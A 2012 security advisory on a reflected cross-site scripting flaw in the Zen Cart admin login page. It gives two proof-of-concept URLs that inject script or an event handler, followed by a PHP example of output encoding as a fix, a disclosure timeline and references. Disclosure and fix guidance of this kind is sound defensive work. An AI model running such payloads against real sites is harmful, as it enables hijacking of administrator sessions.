SSCHADV2012-021 - Zen cart v1.5.0 & v1.51 Cross-Site Scripting vulnerability
Advisory: Zen cart v1.5.0 & v1.51 Cross-Site Scripting vulnerability
Advisory ID: SSCHADV2012-021
Author: Stefan Schurtz
Affected Software: Successfully tested on Zen-cart-v150-12302011
Vendor URL:
Vendor Status: fixed
======================
Vulnerability Description
======================
Zen Cart v1.5.0 and v1.51 are prone to a Cross-Site Scripting vulnerability in the administration login page (login.php), where values supplied in the request URL are reflected into the response without adequate encoding.
======================
PoC-Exploit
======================
http://[target]/zen-cart/admin1/login.php?'"</script><script>alert(/xss/)</script>
http://[target]/zen-cart/admin1/login.php?camefrom=" onmouseover=alert(/xss/) "
======================
Solution
======================
A patch is available, see References.
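The advisory does not reproduce the vendor patch. As an added illustration (not Zen Cart's code and not the vendor's fix), the snippet below shows the context-aware output encoding the two PoC contexts call for, assuming a page that reflects the camefrom parameter into an HTML attribute and the raw query string into an inline script block:

```php
<?php
// Added example, not Zen Cart's code. Assumed reflection points (hypothetical):
//   - $_GET['camefrom'] lands in an HTML attribute value
//   - the raw query string lands in a JavaScript string inside <script>
// Each sink needs an encoder for its own context; one encoder does not fit both.

/** Encode for an HTML attribute value; the attribute must also be quoted. */
function attr_encode(string $value): string
{
    // ENT_QUOTES turns both " and ' into entities, so the PoC value
    // '" onmouseover=alert(/xss/) "' can no longer close the attribute.
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

/** Encode for a JavaScript string literal inside an inline <script> block. */
function js_string_encode(string $value): string
{
    // JSON_HEX_TAG escapes < and > as \u003C / \u003E, so a "</script>"
    // in the input cannot terminate the script block; the other HEX flags
    // neutralise quotes and ampersands in the same way.
    return json_encode(
        $value,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT
    );
}

$camefrom = $_GET['camefrom'] ?? 'index.php';
$query    = $_SERVER['QUERY_STRING'] ?? '';

// Vulnerable pattern (raw reflection, the behaviour the PoC URLs rely on):
// echo '<input type="hidden" name="camefrom" value="' . $camefrom . '">';
// echo '<script>var q = "' . $query . '";</script>';

// Hardened: every reflected value is encoded for the exact context it lands in.
echo '<input type="hidden" name="camefrom" value="' . attr_encode($camefrom) . '">';
echo '<script>var q = ' . js_string_encode($query) . ';</script>';
```

Where camefrom is only ever one of a few local pages, checking it against an allowlist before reflecting it removes the sink altogether and is preferable to encoding alone.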
======================
Disclosure Timeline
======================
08-Sep-2012 – informed Secunia via SVCRP
08-Oct-2012 – patch released
======================
Credits
======================
Vulnerability found and advisory written by Stefan Schurtz.
======================
References
======================
http://www.zen-cart.com/showthread.php?200947-XSS-Flaw-Patch
http://secunia.com/advisories/50574/
http://www.darksecurity.de/advisories/2012/SSCHADV2012-021.txt